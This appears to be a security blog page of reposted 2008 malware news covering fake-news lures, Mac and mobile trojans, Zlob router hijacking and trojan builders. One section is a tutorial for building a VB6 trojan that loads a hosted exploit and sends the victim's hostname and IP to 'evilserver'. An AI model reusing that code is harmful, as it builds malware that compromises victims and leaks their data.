Showing posts with label Trojan. Show all posts
Showing posts with label Trojan. Show all posts

Fake Fernando Alonso car accident used to distribute a new banking Trojan

We have just discovered another spam message used to fool users into installing a new banking Trojan (Trj/Banker.LGC). This time it passes itself off as if it were a real piece of news from El Pais, one of the major newspapers in Spain. It is about a car accident that would have taken place today in Bilbao and where Fernando Alonso, the two-time Formula 1 world champion has been supossedly seriously injured.

As I'm writing this post from Bilbao, I can guarantee that there has not been any car accident in which Fernando Alonso is involved... ;-)

The link to download the video points to the Trojan. This is a screenshot of the fake piece of news:

Fake new

The banking Trojan targets one of the biggest Spanish banks, which in the past was one of the Fernando Alonso's team sponsors.

This is not the first time we have seen this piece of news used to spread malware though, as a few weeks ago we saw a very similar one, the major difference was that it was trying to install a Gaobot worm instead.

[Source: pandasecurity]

PandaLabs Discovers Trojan in Fake UPS Messages

PandaLabs, company that specializes in providing security software solutions, has recently announced that a spam message containing malware has surfaced. The message appears to be sent by parcel delivery company UPS, but in fact it is sent by someone who is maliciously trying to infect your system with a Trojan which PandaLabs named Agent.JEN


Users are advised to be cautious if they receive a message entitled "UPS packet N3621583925" for example. The message claims that a parcel could not be delivered because there is an issue with the recipient's address. In order to recover the parcel which the message says it was sent out on the 1st of July, you are advised to download a .zip file and then print out an invoice. Except that the .zip does not contain any invoices, it contains Agent.JEN.Trojan.

Once the Trojan infects a system, it replaces Userinit.exe with userini.exe. You will not notice any changes in your machine's functionality, except that the Userinit.exe file that runs the system interface, explorer.exe and other processes has been swapped with malware.

Luis Corrons, Technical Director of PandaLabs comments: "All this effort not to be noticed is in consonance with the current malware dynamic: cyber-crooks are no longer interested in fame or notoriety; they are out to get financial returns as silently as possible. We had seen cyber-crooks use erotic pictures, Christmas or romantic cards, fake movie trailers, etc. as bait to make users run infected files. However, it is not usual to see baits like this one. This clearly indicates that cyber-crooks are trying to use baits that do not raise suspicion to spread their creations."

The researchers at PandLabs have discovered that the Trojan connects to a domain in Russia, which is already known to be used by several banker Trojans. A download query is then forwarded to a German domain, requesting the files Rootkit/Agent.JEP and Adware/AntivirusXP2008. These files considerably increase the risk of your system becoming infected.

UPS is currently aware of the situation and has decided to inform its customers via e-mail.

[Source: softpedia]

Mobile Users – Ransomware Trojan Victims

Symbian Series 60 owners in China are facing a rather disturbing problem right now, that of the Kiazha-A Trojan, that holds the phone for ransom, according to reports from McAfee. It is a component of a sophisticated mobile malware bundle, dubbed MultiDropper-CR, that infects other devices via Bluetooth or corrupted MMS messages.

The message owners of the S60 are greeted with
a message that is roughly translated as "Warning: Your device has been affected, please prepare a recharge card of RMB 50 yuan and connect QQ account [specified in the original message but removed by the security company in the report], or your phone will be paralysed!!!" The sum of money isn’t big, converted into US dollars it would cost $7 to regain control of the phone.

The QQ mentioned is an instant messaging network very popular in China, used time and time again for password stealing Trojans over the last months because it supports its own currency, called QQ coins.

McAfee anti-virus analyst Jimmy Shah describes the whole process going on with the infection: "MultiDropper-CR uses malicious payloads (Beselo, Commwarrior) to convince the user their phone is infected. It also sets up SMS forwarding (SmsSend-G) to collect information and potentially passwords. In case the victim doesn’t have a QQ account the malware will order (SmsSend-F) one for them. After all that, Kiazha-A deletes SMS messages to cover its tracks and displays the offer to fix the user’s phone for a small fee." The scheme is devilishly well thought of, and difficult to track back following the malware’s components because "It appears that the author, with a lot of effort and testing, put together various malware like pieces from a toolkit." That method of going back to its roots via specific coding is thus removed entirely.

Everybody hates this kind of messages from Trojans
Comments: Everybody hates this kind of messages from Trojans

Strangely enough for mobile phone malware, it looks like the author worked so hard on getting all of the pieces to work together for a profit, and not to increase his notoriety, as per usual.

[Source: softpedia]

Troj/Dloadr-BKU - Yet Another EXE Downloader

Finding malicious websites on the Internet or receiving emails with infected files is something usual these days so it's pretty important to have an up-to-date antivirus
which would be able to block these threats. However, new infections are born every day so, if you really want to keep your system clean, you must keep an eye on the advisories released by security companies. One of the recently spotted infections is Troj/Dloadr-BKU, a Windows Trojan horse which installs its files into the registry and attempts to drop more malware on the affected computer.

What's worse is that recovering and repairing a computer infected with this Trojan horse requires the user to restore the mlang.dll file from the Windows CD, even if your antivirus manages to clean the whole system.

According to a security report published by Sophos, the Trojan horse drops three executable files on the affected systems, namely 1.exe, 2.exe and 3.exe. Sophos states that 1.exe was detected as Mal/EncPk-DI while 3.exe is said to be a sample of Troj/Dloadr-BKU. The 2.exe executable file can be safely deleted as it doesn't harm the computer.

Trojan horses have always been a problem
Comments: Trojan horses have always been a problem
Credits: Waynecounty

In addition to the mentioned files, the Trojan horse also creates and executes a BAT file, namely a.bat, which, according to Sophos, is detected as Troj/Dloadr-BKU, exactly the Trojan horse we're talking about. "Troj/Dloadr-BKU installs itself as a browser helper object which sends information about the infected system and downloads updates," the security company explained.

Since most antivirus products have already released protection against this threat, it's recommended to run an update and apply the latest patches provided by the security vendor. Also, extra care is advisable as well as a full computer scan in case of suspicious activity spotted on the system

[Source: softpedia]

Trojan Attacks Multimedia Files Stored on Hard Drives

Infected audio and video files show no signs of malware, but are lethal when shared with other users

JULY 10, 2008 | 5:05 PM
By Kelly Jackson Higgins
Senior Editor, Dark Reading

A particularly aggressive Trojan is on the loose that infects multimedia files stored on a user’s hard drive.

“We’ve not seen such a sophisticated Trojan infecting multimedia files before,” says Christoph Alme, lead for the anti-malware team at Secure Computing, which has been studying the Trojan. “We’ve been seeing infected multimedia files for about a month now and [had been] wondering where they came from.”

Like many malware infections, it starts with a visit to a sketchy site -- in this case, a Warez site, where the user downloads what he thinks is a serial key for a copy-protected software package, for example, but instead gets the Trojan that automatically infests all of his multimedia files. When he shares one of those music or video files with another user via a peer-to-peer network, the recipient in turn gets infected by a fake codec: no Warez visit required.

“They lead you to a page under their control when you play back the file, and it has a pop-up telling you that you need to download the ‘codec’ to play the video or audio file,” Alme explains. That "codec" is actually the malware.

The Trojan basically uses legitimate multimedia functions -- no vulnerabilities you can patch -- to do its dirty work. It preys on the Advanced Systems Format (ASF) file feature in MP3 and Windows Media Audio (WMA) music files as well as Windows Media Video (WMV) files, for instance. ASF lets you embed script commands in these file. “The attackers use that to inject their commands into all of your multimedia files,” Alme says.

It also converts MP2 and MP3 files into WMA format so it can infect them as well. “If you have a big MP3 collection, it will be completely converted to WME and WMA and you don’t even notice that on your own system,” he says.

And when the user plays any of the infected files from his hard drive, there’s no indication of the infection.

Secure Computing’s Alme says the Trojan’s main purpose appears to be to spread a password stealer to get user names and passwords.

Meanwhile, Alme says the initial Trojan infection itself isn’t nearly as prevalent as the volume of downstream infected multimedia files. “That’s clearly due to P2P spreading it,” he says.

[Source: darkreading]

Office Fixes Dominate Microsoft Update

Now that the dust is settling from yesterday’s “Patch Tuesday”, Office is the main culprit this time. There is a report from US-CERT that there is a trojan that leverages a hole in Excel making the rounds.

From US-CERT:

US-CERT is aware of public reports of a trojan that may exploit a vulnerability in Microsoft Excel. This trojan is circulating through email messages that contain attached Excel files. Known file names for these attachments are OLYMPIC.XLS and SCHEDULE.XLS. These files may also contain Windows binary executables that can compromise an affected system.

From vnunet:

The four bulletins in yesterday’s Security Update addressed 12 vulnerabilities in the popular software.

Each of the bulletins fix vulnerabilities which could allow an attacker to remotely execute code on the target system. Microsoft has rated all four as ‘critical’, the highest of its four alert levels.

The bulletins address flaws in Outlook, Excel and Office web components. The update applies to Office XP, 2000, 2003 and 2007. Mac versions of Office 2004 and 2008 were also updated, each receiving fixes rated ‘important’.

XP and Vista ducked the spotlight this time.

Article Link

[Source: Liquidmatrix]

T2W --> Trojan to Worm

We have detected an application whose main function is to turn an executable file into a worm, giving it the capacity to spread itself. Even though it’s aim is to give a Trojan the spread capability of a worm, it works with any executable file.

As you can see in the image below, Constructor/Wormer is an eye-catching tool and very easy to use. By checking different flags, you can design a worm with different functionalities, such as compress it with UPX, enable MuteX, select icons, etc.

It also has advanced options to select a certain infection date, disable different options of the operating system, such as the Task Manager, the Windows Registry Editor, Folder Options, and different browsers such as Internet Explorer, Firefox or Opera. Additionally, the worms can be configured to display a message when they are run or activate themselves when Windows is started.

One curious option is that you can avoid the infection of removable drives, such as PenDrives, indicating the username and the name of the drive.

The tool seems to have been created in Spain. You can switch the language of the tool to English, Spanish, Portuguese and Catalan. As you can see, nowadays there are tools that allow any user, no matter their technical knowledge, to create malware very easily.

Thanks to Oscar Anduiza for the information.

[Source: pandalabs]

Trojan exploiting unpatched Mac OS X vulnerability in the wild

The source code of a trojan horse exploiting last week’s uncovered local root escalation vulnerability in Mac OS X 10.4 andMacshadows 10.5 has been released in the wild, allowing malicious attackers to take advantage of the ARDAgent-based trojan in what appears to be a very short vulnerability-to-malware cycle, since the trojan template was released on the same day as details for the vulnerability emerged.

Discussion and release of the source code originally took place at the Mac Shadows forums, whereas the source code is now circulating across many other forums and IRC chat rooms, including several popular ones mainly visited by Chinese script kiddies.

According to an advisory issued by SecureMac last week :

SecureMac has discovered multiple variants of a new Trojan horse in the wild that affects Mac OS X 10.4 and 10.5. The Trojan horse is currently being distributed from a hacker website, where discussion has taken place on distributing the Trojan horse through iChat and Limewire. The source code for the Trojan horse has been distributed, indicating an increased probability of future variants of the Trojan horse.

The Trojan horse runs hidden on the system, and allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging. Additionally, the AppleScript.THT Trojan horse can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing. The Trojan horse exploits a recently discovered vulnerability with the Apple Remote Desktop Agent, which allows it to run as root.


http://blogs.zdnet.com/security/images/ardagent_setuid_trojan.JPG


 Compared to this week’s reported PokerStealer trojan horse targeting Mac OS X users, by trying to trick them intoARDAgent-based trojan empowering the malware with administrator capabilities, the ARDAgent-based trojan is doing it automatically, unless of course you’ve already taken care of the issue until a fix for it is officially available.

The author of the trojan, Adrew, even left a copyright notice within, however, it appears that the source code for the trojan isn’t a one-man operation, but the result of a collaborative discussion aiming to add as many modules as possible. Here’s what he thinks of OS X security, according to his own statement :

    “Apple tells us that OS X is safe and secure and fails to actually confirm that it is so on their own. We are left to experiment and test our own security and too often we discover that we aren’t actually as secure as we were led to believe,” Andrew said in an e-mail. “When you are seeking information about how to secure your own system, frequently the best sources of that information are hackers, not the vendors.”

Going full-disclosure with the idea to shorten the time until a patch is released by the vendor for the sake of closing the “window of opportunity” for malicious abuse of the vulnerability is one thing, releasing a do-it-yourself trojan template in a vulnerability-to-malware fashion is entirely another.


[Source: zdnet]


New BBB trojan attacks

We're seeing some new BBB trojan attacks going around.

This attack method is well-known and has been occurring for months: A high-level executive inside an organization receives an e-mail that mentions a complaint supposedly made to the Better Business Bureau (USA). The e-mail appears to be credible and links to a site in order to download the complaint. The download claims to require IE and ActiveX in order to succeed. Once ActiveX is enabled, the sites drops a backdoor on the system.

The message looks like this:

BBB


his would be fairly convincing to most recipients, especially since the real company and individual names are used.

The message links to a page under us-bbb.com (the real BBB site is at us.bbb.org).

BBB

The site was running over the weekend, was down today on Monday and then just reappeared — with a modified version of the malware.

If the recipient enables ActiveX, the site sends the system a CAB file which gets automatically installed as Acrobat.exe — and displays this:

BBB

In reality, it's just installed a backdoor (which we detect as an Agent variant).

Nasty stuff. Watch out.

[Source: f-secure]
 

Two New Mac OSX Trojans


A report of an Apple Remote Desktop Agent vulnerability recently surfaced. Now there's news of a trojan that can exploit the flaw.

The exploit tool, called "Applescript Trojan horse template" was crafted by forum participants of MacShadows.com. These guys appear to have been hobbyist hackers interested in testing the ARDAgent vulnerability. It doesn't appear to be in the wild at present. We detect it as Backdoor.Mac.Hovdy.a.

What's the ARDAgent flaw? In a nutshell, ARDAgent runs Applescript with root privileges. So once the victim is tricked into installing Hovdy, no user passwords are required for it to do its thing, which is provide backdoor access to the attacker.

You can read more details from Security Fix here and here. SecureMac's advisory is here.

Trojan number two:

There was also another Mac OSX trojan discovered last week.

This one was found by Intego. We detect it as Trojan-PSW:OSX/PokerStealer.A.

Response Analyst Mark G. performed our analysis and provided the following details:

PokerStealer.A heavily relies on social engineering. It comes with the filename PokerGame.app (180Kb), sounds interesting, right?

Trojan-PSW:OSX/PokerStealer.A

However, once executed, it will prompt the user for a password.

Trojan-PSW:OSX/PokerStealer.A

It checks the provided password to see if it matches the username of the machine. If not, it will ask again. It needs the user's password to continue.

What happens behind the scenes is the following: It enables the SSH of the infected machine by running; It acquires the local IP address, subnet mask, private IP address of the router (domain), public IP address by querying via the Internet; It gets the version of OSX, recovers its hash and saves it to a file named secret_file.

After all the necessary information has been gathered it then sends the information to a specific e-mail address with a subject of Howdy and the message details include username, password, and IP addresses.

With the e-mailed information, the attacker can perform routines from a remote location through SSH without the user knowing it and may even take control of the infected machine.



he PokerStealer.A trojan appears to have been written by someone with more than just hobbyist level motivations.

PokerStealer's infection is limited by the password requirement.

So what do you think happens next?

That's right. The author of PokerStealer (motivated by profit) is going to seek out the hobbyist's "Applescript Trojan horse template" and will reduce the infection steps of PokerStealer.A to simply running an application named "Poker Game".

How many Mac users do you think like to play poker?


[Source: f-secure]

New Zlob Trojan

A new Trojan horse masquerading as a video "codec" required to view content on certain Web sites tries to change key settings on the victim's Internet router so that all of the victim's Web traffic is routed through servers controlled by the attackers.

According to researchers contacted by Security Fix, recent versions of the ubiquitous "Zlob" Trojan (also known as DNSChanger) will check to see if the victim uses a wireless or wired hardware router. If so, it tries to guess the password needed to administer the router by consulting a built-in list of default router username/password combinations. If successful, the malware alters the victim's domain name system (DNS) records so that all future traffic passes through the attacker's network first. DNS can be thought of as the Internet's phone book, translating human-friendly names like example.com into numeric addresses that are easier for networking equipment to handle.

zlobb.jpg

While researchers have long warned that threats against hardware routers could one day be incorporated into malicious software, this appears to be the first time this behavior has been spotted in malware released into the wild.

The type of functionality incorporated into this version of the Zlob Trojan is extremely concerning for a number of reasons. First, Zlob is among the most common type of Trojan downloaded onto Windows machines. According to Microsoft, the company's malicious software removal tool zapped some 14.3 million instances of Zlob-related malware from customer machines in the second half of 2007.

The other, more important reason this shift is scary is that a Windows user with a machine infected with a Zlob/DNSChanger variant may succeed in cleaning the malware off an infected computer completely, but still leave the network compromised. Few regular PC users (or even PC technicians) think to look to the router settings, provided the customer's Internet connection is functioning fine.

Philip Sloss, a software engineer for myNetwatchman.com, said he first observed the activity while examining a Zlob variant distributed on May 22. The DNS hijack occurs, he said, during the installer program, so by the time the user sees the fake codec installer screen, the malware has already attempted to change DNS settings on the victim's router.

I reached out to researchers at Sunbelt Software to check Sloss's data, and Sunbelt was able to confirm that the malware successfully changed the DNS settings on a Linksys router (model BEFSX41), pulled straight out of the factory box (with the default username and password). Another test showed that the Zlob variant successfully changed the DNS settings on a Buffalo router running the DD-WRT open source firmware.

Sunbelt also found that if there are multiple machines using the same router, all of the systems connected to that router will have their traffic hijacked.

"This is definitely something we have not seen before," said Eric Sites, chief technology officer at Sunbelt. Sites said his team is testing the new Zlob variants against multiple routers to see how they fare against the malware. "It was only a matter of time before someone started using this attack."

Sloss said he captured traffic showing the Zlob variant trying to reconfigure different routers by requesting the local Web page for the various "setup wizards" that ship with the devices. Some of the requests he noticed are listed below, with my own research noted next to them:

"/index.asp" (still checking, but I believe this is used on DD-WRT and some Linksys routers);
"/dlink/hwiz.html" (D-Link routers);
"wizard.htm" (appears to be used by several different router manufacturers, including Linksys).
"/home.asp" (no idea)

Relatively few people ever change the default username and password on their wireless routers. I see this often, even among people who have locked down their wireless routers with encryption and all kinds of other security settings: When I confront them about why they haven't changed the default credentials used to administer the router settings, their rationale is that, 'Well, why should I change it? An attacker would need to already have a valid connection on my network in order to reach the router administration page, so what's the difference?'

Obviously, an attack like this illustrates the folly of that reasoning.

What's more, the various components dropped onto victim PCs by this malware are fairly ill-detected by most anti-virus tools out there today. A scan of these three files at Virustotal.com -- which checks submitted files against 31 different anti-virus engines -- indicates that only 11 of the anti-virus products currently detect any of them as malicious.

Specific, manufacturer-based video tutorials on how to secure your wireless router are available at this link here. First and foremost, router users should pick strong router administration passwords, choosing usernames and passwords that are not easily guessed or found in the dictionary. Also, avoid using the username as your password (in any event, try to avoid picking a username and password combo included in the list of those this malware tries).

If your machine has been infected by one of these Zlob/DNSchanger Trojans, and your router settings have been altered, I would strongly recommend that you reset the router to its default configuration. Usually, this can be done by inserting something tiny like a paper clip end or pencil tip into a small hole labeled "reset" located on the back of the router. Press and hold down the small button inside until the lights on the front of the router blink off and then on again (usually about 10 seconds). If you don't know your router's default password, you can look it up at this link here.

It's important to note, however, that if there are other Zlob-infected machines using the same router, they will need to be cleared of the trojan before resetting the router. Otherwise,the malware will simply go back and change the router's DNS settings a few minutes after the reboot, said Sunbelt's Sites.

Bear in mind that you will need to reconfigure any security settings you had in place prior to the reset. Check out this site here for video tutorials on how to properly configure your router's encryption and security settings. In addition, you may also need to consult with your Internet service provider to find out which DNS servers your network should be using.

Source: Washington Post

OSX.Trojan.PokerStealer Trojan Horse

INTEGO SECURITY MEMO - June 20, 2008

Exploit: OSX.Trojan.PokerStealer

Discovered: June 20, 2008

Risk: Low

Description: A Trojan horse has been found in the wild masquerading as program for Mac OS X called “PokerGame”. The Trojan in question is a shell script encapsulated in an application, and is distributed in a 65 KB Zip archive; unzipped, it is 180 KB.


The Trojan horse, when run, activates ssh on the Mac on which it is running, then sends the user name and password hash, along with the IP address of the Mac, to a server. It asks for an administrator’s password after displaying a dialog saying, “A corrupt preference file has been detected and must be repaired.” Entering the administrator’s password enables the program to accomplish its tasks. After gaining ssh access to a Mac, malicious users can attempt to take control of them, delete files, damage the operating system, or much more.

Intego VirusBarrier X4 and X5 with virus definitions dated June 20, 2008 protect against this Trojan horse. Intego recommends that users never download and install software from untrusted sources or questionable web sites.

About Intego
Intego develops and sells desktop Internet security and privacy software for Macintosh.

Intego provides the widest range of software to protect users and their Macs from the dangers of the Internet. Intego's multilingual software and support repeatedly receives awards from Mac magazines, and protects more than one million users in over 60 countries. Intego has headquarters in the USA, France and Japan.

As the dangers of the Internet grow, Intego is hard at work, developing new software to protect users and their Macs from th latest security and privacy threats.

We protect your world.


[Source: Intego]


Simple Trojan using 0-Day Exploit:

Greetz: Edu, Str0ke…DarkPontifex, Euan

I am using “Windows Animated Cursor Handling Exploit (0day) (Version3) by jamikazu” to demonstrate this Example.

Technical Details:

Tested on:

Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)

Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)

Windows XP SP2

 Target System: Windows xpsp2 fully patched version, with internet explorer 7(Beta3)

So I installed IE7 Beta3 on my Pc. Start VisualBasic6.0



With Standard EXE project.



Then add Ieframe.dll, you will get an error that “File Not Found”. This is because IE7 replaces Ieframe.dll controls. Let me explain you what is IEframe.dll

 Ieframe.dll is a simple VB-browser or browser control

We can use this as   wb1.navigate (http://www.google.co.in/)

Ieframe.dll comes with vb6.0 but after installing IE7, ieframe.dll become useless because

IE7 has its own cookie for vb6.0 shdocvw.dll J.How over come the error? I will show below

Browse Shdocvw.dll After adding it points Microsoft internet controls. Then press Apply

Also add Mswinsck.ocx ,flash9b.dll


Drag browser control (shdocvw.dll) to from toolbox along with flash9b.dll, mswinsck.ock

Then Drag flash ocx and add your favorite swf to it. Then drag shdocvw.dll but make

Sure that the size is smaller as shown in the figure. Because our idea is to execute the

The url size doesn’t matter..

 

Then problem of this code executing IE was DEP. Then advantage with this Trojan is

It doesn’t have DEP at all. As we include components with this application.

It doesn’t even rely on system .dlls or activex controls

The reason why I dint added processes hiding code is, easily detected by AV’s

Add the following code

Private Sub Form_Load()

Dim hsname As String

Dim ipaddr As String

hsname = winsck.LocalHostName

ipaddr = winsck.LocalIP

Wb.Navigate ("http://jamikazu.110mb.com/ani_exploit4/ani_exp4.htm")

Wb.Navigate2 ("http://evilserver/hsname ipaddr")

 

End Sub

 

Wb is the browser control and Wb.Navigate loads the exploit.

Wb.naviagate2 sends victim’s ip and host name to attacker

Winsck is MSwinsck.ocx (Winsock)

 


Then compile it and Run


[Source:     ]

Another trojan creator.

09 june 08

Everybody knows that
nowadays it is very easy to create malicious programs or new variants
of malware generally with the help of programs like virus constructors,
which are publicly released by real experts in creating malware.

As we mentioned in a previously published post,
these “beginners” in creating malware use different antivirus scanners
with which they test their creations until they are undetectable.

In
this case, one of these tools is Constructor/Turkojan, which offers new
different functionalities with each version, currently the v4.0.
Among the options offered, the following are included:

Remote
Desktop / Webcam Streaming / Audio Streaming / Remote passwords / MSN
Sniffer / Remote Shell / Advanced File Manager / Online & Offline
keylogger / Information about remote computer / Etc..

You
may be wondering which benefits the author gains with this tool.
Obviously, there is a financial reason behind this. Almost all users
who design this type of tools offer versions with different services,
which include customized support depending on the sum of money paid.

This
is a clear example that shows that cybercrooks are more are more
professional and that there is a real organized business which looks
for the profitability of their creations.

[Source: PandaLabs Blog ]